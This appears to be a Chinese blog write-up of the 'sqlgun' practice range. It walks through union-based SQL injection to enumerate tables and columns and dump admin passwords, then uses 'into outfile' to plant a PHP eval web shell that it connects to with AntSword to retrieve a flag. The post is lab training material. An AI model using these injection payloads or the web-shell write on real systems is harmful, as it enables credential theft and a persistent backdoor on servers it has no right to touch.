当前位置: 首页 > news >正文

sqlgun靶场训练

news 2025/8/3 21:15:46

1.看到php?id=  ,然后刚好有个框,直接测试sql注入

2.发现输入1' union select 1,2,3#的时候在2处有回显

3.查看表名

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

4.查看列名

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #

5.查看admin的密码

-1' union select 1,group_concat(id,admin,password),3 from admin #

6.目录扫描发现有一个phpinfo.php,访问绝对路径

6.构造一句话木马语句

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/q.php' #

7.蚁剑连接

8.根目录找到flag

http://www.lryc.cn/news/440646.html

相关文章:

  • 简化登录流程,助力应用建立用户体系
  • 【研发日记】嵌入式处理器技能解锁(六)——ARM的Cortex-M4内核
  • 深度学习经典模型之T5
  • 10.第二阶段x86游戏实战2-反编译自己的程序加深堆栈的理解
  • ARM总复习
  • ​​使用ENVI之大气校正(下)
  • C++(学习)2024.9.18
  • 认知小文2《成功之路:习惯、学习与实践》
  • 【数据仓库】数据仓库层次化设计
  • 【DAY20240918】03教你轻松配置 Git 远程仓库并高效推送代码!
  • 从IPC摄像机读取视频帧解码并转化为YUV数据到转化为Bitmap
  • LeetCode 面试经典 150 题回顾
  • 【网络安全的神秘世界】渗透测试基础
  • 【重学 MySQL】二十九、函数的理解
  • MySQL5.7主从复制搭建-gtid方式
  • golang学习笔记22——golang微服务中数据竞争问题及解决方案
  • yolo训练出现Could not load library libcudnn_cnn_train.so.8问题及解决方法
  • 携手科大讯飞丨云衔科技为企业提供全栈AI技术解决方案
  • 57页PPT | 智慧文旅整体建设解决方案
  • 线性代数之QR分解和SVD分解
  • 在虚拟机安装mysql数据库
  • 详解QT插件机制
  • 【Hot100】LeetCode—32. 最长有效括号
  • 力扣198-打家劫舍
  • Python 入门教程(4)数据类型 | 4.1、数据类型
  • 如何进行DAP-seq的数据挖掘,筛选验证位点
  • 学习大数据DAY56 业务理解和第一次接入
  • java线程池编程示例
  • 02 基于STM32的按键控制继电器驱动电机
  • 网页本地存储